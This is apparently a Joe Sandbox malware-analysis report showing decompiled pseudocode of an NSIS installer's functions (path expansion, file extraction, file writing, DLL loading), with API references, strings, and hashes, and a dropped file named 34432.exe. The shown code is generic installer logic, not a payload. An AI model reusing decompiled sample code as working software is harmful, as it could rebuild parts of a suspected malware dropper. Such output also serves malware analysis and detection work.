                            				signed char _t84;
                            				signed int _t85;
                            				void* _t98;
                            				void* _t104;
                            				intOrPtr* _t105;
                            				void* _t107;
                            				WCHAR* _t108;
                            				void* _t110;
                            
                            				_t107 = __esi;
                            				_t104 = __edi;
                            				_t71 = __ebx;
                            				_t44 = _a8;
                            				if(_t44 < 0) {
                            					_t44 =  *( *0x433edc - 4 + _t44 * 4);
                            				}
                            				_push(_t71);
                            				_push(_t107);
                            				_push(_t104);
                            				_t105 =  *0x434f38 + _t44 * 2;
                            				_t45 = 0x432ea0;
                            				_t108 = 0x432ea0;
                            				if(_a4 >= 0x432ea0 && _a4 - 0x432ea0 >> 1 < 0x800) {
                            					_t108 = _a4;
                            					_a4 = _a4 & 0x00000000;
                            				}
                            				_t81 =  *_t105;
                            				_a8 = _t81;
                            				if(_t81 == 0) {
                            					L43:
                            					 *_t108 =  *_t108 & 0x00000000;
                            					if(_a4 == 0) {
                            						return _t45;
                            					}
                            					return E0040653D(_a4, _t45);
                            				} else {
                            					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                            						_t98 = 2;
                            						_t105 = _t105 + _t98;
                            						if(_t81 >= 4) {
                            							if(__eflags != 0) {
                            								 *_t108 = _t81;
                            								_t108 = _t108 + _t98;
                            								__eflags = _t108;
                            							} else {
                            								 *_t108 =  *_t105;
                            								_t108 = _t108 + _t98;
                            								_t105 = _t105 + _t98;
                            							}
                            							L42:
                            							_t82 =  *_t105;
                            							_a8 = _t82;
                            							if(_t82 != 0) {
                            								_t81 = _a8;
                            								continue;
                            							}
                            							goto L43;
                            						}
                            						_t84 =  *((intOrPtr*)(_t105 + 1));
                            						_t47 =  *_t105;
                            						_t48 = _t47 & 0x000000ff;
                            						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                            						_t85 = _t84 & 0x000000ff;
                            						_v28 = _t48 | 0x00008000;
                            						_t77 = 2;
                            						_v16 = _t85;
                            						_t105 = _t105 + _t77;
                            						_v24 = _t48;
                            						_v20 = _t85 | 0x00008000;
                            						if(_a8 != _t77) {
                            							__eflags = _a8 - 3;
                            							if(_a8 != 3) {
                            								__eflags = _a8 - 1;
                            								if(__eflags == 0) {
                            									__eflags = (_t48 | 0xffffffff) - _v12;
                            									E0040657A(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                            								}
                            								L38:
                            								_t108 =  &(_t108[lstrlenW(_t108)]);
                            								_t45 = 0x432ea0;
                            								goto L42;
                            							}
                            							_t78 = _v12;
                            							__eflags = _t78 - 0x1d;
                            							if(_t78 != 0x1d) {
                            								__eflags = (_t78 << 0xb) + 0x436000;
                            								E0040653D(_t108, (_t78 << 0xb) + 0x436000);
                            							} else {
                            								E00406484(_t108,  *0x434f08);
                            							}
                            							__eflags = _t78 + 0xffffffeb - 7;
                            							if(__eflags < 0) {
                            								L29:
                            								E004067C4(_t108);
                            							}
                            							goto L38;
                            						}
                            						if( *0x434f84 != 0) {
                            							_t77 = 4;
                            						}
                            						_t121 = _t48;
                            						if(_t48 >= 0) {
                            							__eflags = _t48 - 0x25;
                            							if(_t48 != 0x25) {
                            								__eflags = _t48 - 0x24;
                            								if(_t48 == 0x24) {
                            									GetWindowsDirectoryW(_t108, 0x400);
                            									_t77 = 0;
                            								}
                            								while(1) {
                            									__eflags = _t77;
                            									if(_t77 == 0) {
                            										goto L26;
                            									}
                            									_t59 =  *0x434f04;
                            									_t77 = _t77 - 1;
                            									__eflags = _t59;
                            									if(_t59 == 0) {
                            										L22:
                            										_t61 = SHGetSpecialFolderLocation( *0x434f08,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                            										__eflags = _t61;
                            										if(_t61 != 0) {
                            											L24:
                            											 *_t108 =  *_t108 & 0x00000000;
                            											__eflags =  *_t108;
                            											continue;
                            										}
                            										__imp__SHGetPathFromIDListW(_v8, _t108);
                            										_a8 = _t61;
                            										__imp__CoTaskMemFree(_v8);
                            										__eflags = _a8;
                            										if(_a8 != 0) {
                            											goto L26;
                            										}
                            										goto L24;
                            									}
                            									_t63 =  *_t59( *0x434f08,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108); // executed
                            									__eflags = _t63;
                            									if(_t63 == 0) {
                            										goto L26;
                            									}
                            									goto L22;
                            								}
                            								goto L26;
                            							}
                            							GetSystemDirectoryW(_t108, 0x400);
                            							goto L26;
                            						} else {
                            							E0040640B( *0x434f38, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x434f38 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                            							if( *_t108 != 0) {
                            								L27:
                            								if(_v16 == 0x1a) {
                            									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                            								}
                            								goto L29;
                            							}
                            							E0040657A(_t77, _t105, _t108, _t108, _v16);
                            							L26:
                            							if( *_t108 == 0) {
                            								goto L29;
                            							}
                            							goto L27;
                            						}
                            					}
                            					goto L43;
                            				}
                            			}

                            APIs
                            • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,00000400), ref: 00406695
                            • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,00000400,00000000,0042C248,?,004055D6,0042C248,00000000,00000000,?,76CDEA30), ref: 004066A8
                            • lstrcatW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,\Microsoft\Internet Explorer\Quick Launch), ref: 0040671F
                            • lstrlenW.KERNEL32(C:\Users\user\AppData\Roaming\34432.exe,00000000,0042C248,?,004055D6,0042C248,00000000), ref: 00406779
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: Directory$SystemWindowslstrcatlstrlen
                            • String ID: C:\Users\user\AppData\Roaming\34432.exe$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                            • API String ID: 4260037668-3546267139
                            • Opcode ID: c06be4e573324e40d3b735838f303e9f3324c9f348604da111048893f4ce4833
                            • Instruction ID: 685928b229c5d1fd60d609eb920d771e11fa4d776b5b66b0bad6c944a0f90ddf
                            • Opcode Fuzzy Hash: c06be4e573324e40d3b735838f303e9f3324c9f348604da111048893f4ce4833
                            • Instruction Fuzzy Hash: 1D61D131900205EADB209F64DD80BAE77A5EF54318F22813BE907B72D0D77D99A1CB5D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 339 4032b4-4032cb 340 4032d4-4032dd 339->340 341 4032cd 339->341 342 4032e6-4032eb 340->342 343 4032df 340->343 341->340 344 4032fb-403308 call 4034cf 342->344 345 4032ed-4032f6 call 4034e5 342->345 343->342 349 4034bd 344->349 350 40330e-403312 344->350 345->344 351 4034bf-4034c0 349->351 352 403468-40346a 350->352 353 403318-403361 GetTickCount 350->353 356 4034c8-4034cc 351->356 354 4034aa-4034ad 352->354 355 40346c-40346f 352->355 357 4034c5 353->357 358 403367-40336f 353->358 359 4034b2-4034bb call 4034cf 354->359 360 4034af 354->360 355->357 361 403471 355->361 357->356 362 403371 358->362 363 403374-403382 call 4034cf 358->363 359->349 372 4034c2 359->372 360->359 365 403474-40347a 361->365 362->363 363->349 371 403388-403391 363->371 369 40347c 365->369 370 40347e-40348c call 4034cf 365->370 369->370 370->349 376 40348e-40349a call 4060df 370->376 374 403397-4033b7 call 406a65 371->374 372->357 381 403460-403462 374->381 382 4033bd-4033d0 GetTickCount 374->382 383 403464-403466 376->383 384 40349c-4034a6 376->384 381->351 385 4033d2-4033da 382->385 386 40341b-40341d 382->386 383->351 384->365 387 4034a8 384->387 388 4033e2-403418 MulDiv wsprintfW call 40559f 385->388 389 4033dc-4033e0 385->389 390 403454-403458 386->390 391 40341f-403423 386->391 387->357 388->386 389->386 389->388 390->358 392 40345e 390->392 394 403425-40342c call 4060df 391->394 395 40343a-403445 391->395 392->357 400 403431-403433 394->400 396 403448-40344c 395->396 396->374 399 403452 396->399 399->357 400->383 401 403435-403438 400->401 401->396
                            C-Code - Quality: 95%
                            			E004032B4(int _a4, intOrPtr _a8, intOrPtr _a12, int _a16, signed char _a19) {
                            				signed int _v8;
                            				int _v12;
                            				intOrPtr _v16;
                            				long _v20;
                            				intOrPtr _v24;
                            				short _v152;
                            				void* _t65;
                            				long _t70;
                            				intOrPtr _t75;
                            				long _t76;
                            				void* _t78;
                            				int _t88;
                            				intOrPtr _t92;
                            				intOrPtr _t95;
                            				long _t96;
                            				signed int _t97;
                            				int _t98;
                            				int _t99;
                            				void* _t101;
                            				void* _t102;
                            
                            				_t97 = _a16;
                            				_t92 = _a12;
                            				_v12 = _t97;
                            				if(_t92 == 0) {
                            					_v12 = 0x8000;
                            				}
                            				_v8 = _v8 & 0x00000000;
                            				_v16 = _t92;
                            				if(_t92 == 0) {
                            					_v16 = 0x422a20;
                            				}
                            				_t62 = _a4;
                            				if(_a4 >= 0) {
                            					E004034E5( *0x434f58 + _t62);
                            				}
                            				if(E004034CF( &_a16, 4) == 0) {
                            					L41:
                            					_push(0xfffffffd);
                            					goto L42;
                            				} else {
                            					if((_a19 & 0x00000080) == 0) {
                            						if(_t92 != 0) {
                            							if(_a16 < _t97) {
                            								_t97 = _a16;
                            							}
                            							if(E004034CF(_t92, _t97) != 0) {
                            								_v8 = _t97;
                            								L44:
                            								return _v8;
                            							} else {
                            								goto L41;
                            							}
                            						}
                            						if(_a16 <= _t92) {
                            							goto L44;
                            						}
                            						_t88 = _v12;
                            						while(1) {
                            							_t98 = _a16;
                            							if(_a16 >= _t88) {
                            								_t98 = _t88;
                            							}
                            							if(E004034CF(0x41ea20, _t98) == 0) {
                            								goto L41;
                            							}
                            							if(E004060DF(_a8, 0x41ea20, _t98) == 0) {
                            								L28:
                            								_push(0xfffffffe);
                            								L42:
                            								_pop(_t65);
                            								return _t65;
                            							}
                            							_v8 = _v8 + _t98;
                            							_a16 = _a16 - _t98;
                            							if(_a16 > 0) {
                            								continue;
                            							}
                            							goto L44;
                            						}
                            						goto L41;
                            					}
                            					_t70 = GetTickCount();
                            					 *0x40d384 =  *0x40d384 & 0x00000000;
                            					 *0x40d380 =  *0x40d380 & 0x00000000;
                            					_t14 =  &_a16;
                            					 *_t14 = _a16 & 0x7fffffff;
                            					_v20 = _t70;
                            					 *0x40ce68 = 8;
                            					 *0x416a10 = 0x40ea08;
                            					 *0x416a0c = 0x40ea08;
                            					 *0x416a08 = 0x416a08;
                            					_a4 = _a16;
                            					if( *_t14 <= 0) {
                            						goto L44;
                            					} else {
                            						goto L9;
                            					}
                            					while(1) {
                            						L9:
                            						_t99 = 0x4000;
                            						if(_a16 < 0x4000) {
                            							_t99 = _a16;
                            						}
                            						if(E004034CF(0x41ea20, _t99) == 0) {
                            							goto L41;
                            						}
                            						_a16 = _a16 - _t99;
                            						 *0x40ce58 = 0x41ea20;
                            						 *0x40ce5c = _t99;
                            						while(1) {
                            							_t95 = _v16;
                            							 *0x40ce60 = _t95;
                            							 *0x40ce64 = _v12;
                            							_t75 = E00406A65(0x40ce58);
                            							_v24 = _t75;
                            							if(_t75 < 0) {
                            								break;
                            							}
                            							_t101 =  *0x40ce60 - _t95;
                            							_t76 = GetTickCount();
                            							_t96 = _t76;
                            							if(( *0x434fb4 & 0x00000001) != 0 && (_t76 - _v20 > 0xc8 || _a16 == 0)) {
                            								wsprintfW( &_v152, L"... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
                            								_t102 = _t102 + 0xc;
                            								E0040559F(0,  &_v152);
                            								_v20 = _t96;
                            							}
                            							if(_t101 == 0) {
                            								if(_a16 > 0) {
                            									goto L9;
                            								}
                            								goto L44;
                            							} else {
                            								if(_a12 != 0) {
                            									_v8 = _v8 + _t101;
                            									_v12 = _v12 - _t101;
                            									_v16 =  *0x40ce60;
                            									L23:
                            									if(_v24 != 1) {
                            										continue;
                            									}
                            									goto L44;
                            								}
                            								_t78 = E004060DF(_a8, _v16, _t101); // executed
                            								if(_t78 == 0) {
                            									goto L28;
                            								}
                            								_v8 = _v8 + _t101;
                            								goto L23;
                            							}
                            						}
                            						_push(0xfffffffc);
                            						goto L42;
                            					}
                            					goto L41;
                            				}
                            			}


                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CountTick$wsprintf
                            • String ID: *B$ A$ A$... %d%%$}8@
                            • API String ID: 551687249-3029848762
                            • Opcode ID: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                            • Instruction ID: 54ab186c05730647c672001b6e56d135182c7b51176e178f40f708a1e84a381e
                            • Opcode Fuzzy Hash: d1cfd4714e4687a3a26bd4ac3846c46955ae89f51795138bd42b88bfc39313c7
                            • Instruction Fuzzy Hash: E251BD31810219EBCF11DF65DA44B9E7BB8AF05756F10827BE804BB2C1D7789E44CBA9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 75%
                            			E0040176F(FILETIME* __ebx, void* __eflags) {
                            				void* __esi;
                            				void* _t35;
                            				void* _t43;
                            				void* _t45;
                            				FILETIME* _t51;
                            				FILETIME* _t64;
                            				void* _t66;
                            				signed int _t72;
                            				FILETIME* _t73;
                            				FILETIME* _t77;
                            				signed int _t79;
                            				WCHAR* _t81;
                            				void* _t83;
                            				void* _t84;
                            				void* _t86;
                            
                            				_t77 = __ebx;
                            				 *(_t86 - 8) = E00402DA6(0x31);
                            				 *(_t86 + 8) =  *(_t86 - 0x30) & 0x00000007;
                            				_t35 = E00405E83( *(_t86 - 8));
                            				_push( *(_t86 - 8));
                            				_t81 = L"C:\\Users";
                            				if(_t35 == 0) {
                            					lstrcatW(E00405E0C(E0040653D(_t81, 0x441000)), ??);
                            				} else {
                            					E0040653D();
                            				}
                            				E004067C4(_t81);
                            				while(1) {
                            					__eflags =  *(_t86 + 8) - 3;
                            					if( *(_t86 + 8) >= 3) {
                            						_t66 = E00406873(_t81);
                            						_t79 = 0;
                            						__eflags = _t66 - _t77;
                            						if(_t66 != _t77) {
                            							_t73 = _t66 + 0x14;
                            							__eflags = _t73;
                            							_t79 = CompareFileTime(_t73, _t86 - 0x24);
                            						}
                            						asm("sbb eax, eax");
                            						_t72 =  ~(( *(_t86 + 8) + 0xfffffffd | 0x80000000) & _t79) + 1;
                            						__eflags = _t72;
                            						 *(_t86 + 8) = _t72;
                            					}
                            					__eflags =  *(_t86 + 8) - _t77;
                            					if( *(_t86 + 8) == _t77) {
                            						E00406008(_t81);
                            					}
                            					__eflags =  *(_t86 + 8) - 1;
                            					_t43 = E0040602D(_t81, 0x40000000, (0 |  *(_t86 + 8) != 0x00000001) + 1);
                            					__eflags = _t43 - 0xffffffff;
                            					 *(_t86 - 0x38) = _t43;
                            					if(_t43 != 0xffffffff) {
                            						break;
                            					}
                            					__eflags =  *(_t86 + 8) - _t77;
                            					if( *(_t86 + 8) != _t77) {
                            						E0040559F(0xffffffe2,  *(_t86 - 8));
                            						__eflags =  *(_t86 + 8) - 2;
                            						if(__eflags == 0) {
                            							 *((intOrPtr*)(_t86 - 4)) = 1;
                            						}
                            						L31:
                            						 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t86 - 4));
                            						__eflags =  *0x434f88;
                            						goto L32;
                            					} else {
                            						E0040653D(0x40b5f0, _t83);
                            						E0040653D(_t83, _t81);
                            						E0040657A(_t77, _t81, _t83, "C:\Users\jones\AppData\Roaming",  *((intOrPtr*)(_t86 - 0x1c)));
                            						E0040653D(_t83, 0x40b5f0);
                            						_t64 = E00405B9D("C:\Users\jones\AppData\Roaming",  *(_t86 - 0x30) >> 3) - 4;
                            						__eflags = _t64;
                            						if(_t64 == 0) {
                            							continue;
                            						} else {
                            							__eflags = _t64 == 1;
                            							if(_t64 == 1) {
                            								 *0x434f88 =  &( *0x434f88->dwLowDateTime);
                            								L32:
                            								_t51 = 0;
                            								__eflags = 0;
                            							} else {
                            								_push(_t81);
                            								_push(0xfffffffa);
                            								E0040559F();
                            								L29:
                            								_t51 = 0x7fffffff;
                            							}
                            						}
                            					}
                            					L33:
                            					return _t51;
                            				}
                            				E0040559F(0xffffffea,  *(_t86 - 8));
                            				 *0x434fb4 =  *0x434fb4 + 1;
                            				_t45 = E004032B4( *((intOrPtr*)(_t86 - 0x28)),  *(_t86 - 0x38), _t77, _t77); // executed
                            				 *0x434fb4 =  *0x434fb4 - 1;
                            				__eflags =  *(_t86 - 0x24) - 0xffffffff;
                            				_t84 = _t45;
                            				if( *(_t86 - 0x24) != 0xffffffff) {
                            					L22:
                            					SetFileTime( *(_t86 - 0x38), _t86 - 0x24, _t77, _t86 - 0x24); // executed
                            				} else {
                            					__eflags =  *((intOrPtr*)(_t86 - 0x20)) - 0xffffffff;
                            					if( *((intOrPtr*)(_t86 - 0x20)) != 0xffffffff) {
                            						goto L22;
                            					}
                            				}
                            				FindCloseChangeNotification( *(_t86 - 0x38)); // executed
                            				__eflags = _t84 - _t77;
                            				if(_t84 >= _t77) {
                            					goto L31;
                            				} else {
                            					__eflags = _t84 - 0xfffffffe;
                            					if(_t84 != 0xfffffffe) {
                            						E0040657A(_t77, _t81, _t84, _t81, 0xffffffee);
                            					} else {
                            						E0040657A(_t77, _t81, _t84, _t81, 0xffffffe9);
                            						lstrcatW(_t81,  *(_t86 - 8));
                            					}
                            					_push(0x200010);
                            					_push(_t81);
                            					E00405B9D();
                            					goto L29;
                            				}
                            				goto L33;
                            			}


                            APIs
                            • lstrcatW.KERNEL32(00000000,00000000), ref: 004017B0
                            • CompareFileTime.KERNEL32(-00000014,?,C:\Users\user\AppData\Roaming\34432.exe,C:\Users\user\AppData\Roaming\34432.exe,00000000,00000000,C:\Users\user\AppData\Roaming\34432.exe,00441000,?,?,00000031), ref: 004017D5
                              • Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A
                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(0042C248,00000000,?,76CDEA30,?,?,?,?,?,?,?,?,?,00403418,00000000,?), ref: 004055D7
                              • Part of subcall function 0040559F: lstrlenW.KERNEL32(00403418,0042C248,00000000,?,76CDEA30,?,?,?,?,?,?,?,?,?,00403418,00000000), ref: 004055E7
                              • Part of subcall function 0040559F: lstrcatW.KERNEL32(0042C248,00403418), ref: 004055FA
                              • Part of subcall function 0040559F: SetWindowTextW.USER32(0042C248,0042C248), ref: 0040560C
                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405632
                              • Part of subcall function 0040559F: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040564C
                              • Part of subcall function 0040559F: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040565A
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000001.00000002.225012224.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225062362.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225071599.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225077053.000000000040D000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225106103.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225114682.0000000000442000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000001.00000002.225119800.0000000000446000.00000002.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                            • String ID: C:\Users\user\AppData\Roaming$C:\Users\user\AppData\Roaming\34432.exe
                            • API String ID: 1941528284-1523479004
                            • Opcode ID: 3dea8835135b3834e701fe10f85874e2ee0770673dec5a47873efbfea76d0da0
                            • Instruction ID: 1e3f5e060805a06bac003644be00ba5f3fef1f2c353f2d3d357c0a6c5ca497fd
                            • Opcode Fuzzy Hash: 3dea8835135b3834e701fe10f85874e2ee0770673dec5a47873efbfea76d0da0
                            • Instruction Fuzzy Hash: F4419371900108BACF11BFB5DD85DAE7A79EF45768B20423FF422B10E2D63C8A91966D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 100%
                            			E0040689A(intOrPtr _a4) {
                            				short _v576;
                            				signed int _t13;
                            				struct HINSTANCE__* _t17;
                            				signed int _t19;
                            				void* _t24;
                            
                            				_t13 = GetSystemDirectoryW( &_v576, 0x104);
                            				if(_t13 > 0x104) {
                            					_t13 = 0;
                            				}
                            				if(_t13 == 0 ||  *((short*)(_t24 + _t13 * 2 - 0x23e)) == 0x5c) {
                            					_t19 = 1;
                            				} else {
                            					_t19 = 0;
                            				}
                            				wsprintfW(_t24 + _t13 * 2 - 0x23c, L"%s%S.dll", 0x40a014 + _t19 * 2, _a4);
                            				_t17 = LoadLibraryExW( &_v576, 0, 8); // executed
                            				return _t17;
                            			}

                            APIs
                            • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068B1
                            • wsprintfW.USER32 ref: 004068EC
                            • LoadLibraryExW.KERNELBASE(?,00000000,00000008), ref: 00406900
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: DirectoryLibraryLoadSystemwsprintf
                            • String ID: %s%S.dll$UXTHEME$\
                            • API String ID: 2200240437-1946221925
                            • Opcode ID: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                            • Instruction ID: 21628a1c63ce2f140fdd4d546058f3b0ba52bdb51e88dcb335987c0e659eada7
                            • Opcode Fuzzy Hash: 70474fd7a4f9c0ba06a591290262a653731ba096fd3a0e6ffa6d52d828e9795f
                            • Instruction Fuzzy Hash: D0F0F671511119ABDB10BB64DD0DF9B376CBF00305F10847AA646F10D0EB7CDA68CBA8
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (image not reproduced)
                            C-Code - Quality: 100%
                            			E0040605C(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                            				intOrPtr _v8;
                            				short _v12;
                            				short _t12;
                            				intOrPtr _t13;
                            				signed int _t14;
                            				WCHAR* _t17;
                            				signed int _t19;
                            				signed short _t23;
                            				WCHAR* _t26;
                            
                            				_t26 = _a4;
                            				_t23 = 0x64;
                            				while(1) {
                            					_t12 =  *L"nsa"; // 0x73006e
                            					_t23 = _t23 - 1;
                            					_v12 = _t12;
                            					_t13 =  *0x40a57c; // 0x61
                            					_v8 = _t13;
                            					_t14 = GetTickCount();
                            					_t19 = 0x1a;
                            					_v8 = _v8 + _t14 % _t19;
                            					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                            					if(_t17 != 0) {
                            						break;
                            					}
                            					if(_t23 != 0) {
                            						continue;
                            					} else {
                            						 *_t26 =  *_t26 & _t23;
                            					}
                            					L4:
                            					return _t17;
                            				}
                            				_t17 = _t26;
                            				goto L4;
                            			}

                            APIs
                            • GetTickCount.KERNEL32 ref: 0040607A
                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,0040352B,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00406095
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CountFileNameTempTick
                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                            • API String ID: 1716503409-678247507
                            • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                            • Instruction ID: cc98cbd97bba9fac9576f26979179aa346a2ab2dc3c85b14509754d74f2b81c3
                            • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                            • Instruction Fuzzy Hash: CEF09076B40204FBEB00CF69ED05E9EB7BCEB95750F11803AFA05F7140E6B499648768
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph (image not reproduced)
                            C-Code - Quality: 86%
                            			E004015C1(short __ebx, void* __eflags) {
                            				void* _t17;
                            				int _t23;
                            				void* _t25;
                            				signed char _t26;
                            				short _t28;
                            				short _t31;
                            				short* _t34;
                            				void* _t36;
                            
                            				_t28 = __ebx;
                            				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                            				_t17 = E00405EB7(_t16);
                            				_t32 = _t17;
                            				if(_t17 != __ebx) {
                            					do {
                            						_t34 = E00405E39(_t32, 0x5c);
                            						_t31 =  *_t34;
                            						 *_t34 = _t28;
                            						if(_t31 != _t28) {
                            							L5:
                            							_t25 = E00405AEB( *(_t36 + 8));
                            						} else {
                            							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                            							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405B08(_t42) == 0) {
                            								goto L5;
                            							} else {
                            								_t25 = E00405A6E( *(_t36 + 8));
                            							}
                            						}
                            						if(_t25 != _t28) {
                            							if(_t25 != 0xb7) {
                            								L9:
                            								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                            							} else {
                            								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                            								if((_t26 & 0x00000010) == 0) {
                            									goto L9;
                            								}
                            							}
                            						}
                            						 *_t34 = _t31;
                            						_t32 = _t34 + 2;
                            					} while (_t31 != _t28);
                            				}
                            				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                            					_push(0xfffffff5);
                            					E00401423();
                            				} else {
                            					E00401423(0xffffffe6);
                            					E0040653D(0x441000,  *(_t36 + 8));
                            					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                            					if(_t23 == 0) {
                            						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                            					}
                            				}
                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t36 - 4));
                            				return 0;
                            			}

                            APIs
                              • Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,76CDFAA0,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,76CDFAA0,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
                              • Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2
                            • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                              • Part of subcall function 00405A6E: CreateDirectoryW.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405AB1
                            • SetCurrentDirectoryW.KERNELBASE(?,00441000,?,00000000,000000F0), ref: 0040164D
                            Memory Dump Source
                            • Source File: 00000001.00000002.225025140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_400000_Install.jbxd
                            Similarity
                            • API ID: CharNext$Directory$AttributesCreateCurrentFile
                            • String ID:
                            • API String ID: 1892508949-0
                            • Opcode ID: a0d011628c810d07a54685ac6612ef99f8e632c27b07218bf1f4fe72126052a1
                            • Instruction ID: 910f9ca0e916fbda017ea5bccd1daba2d9720f9cae8b5c5670dceb894c5ef12e
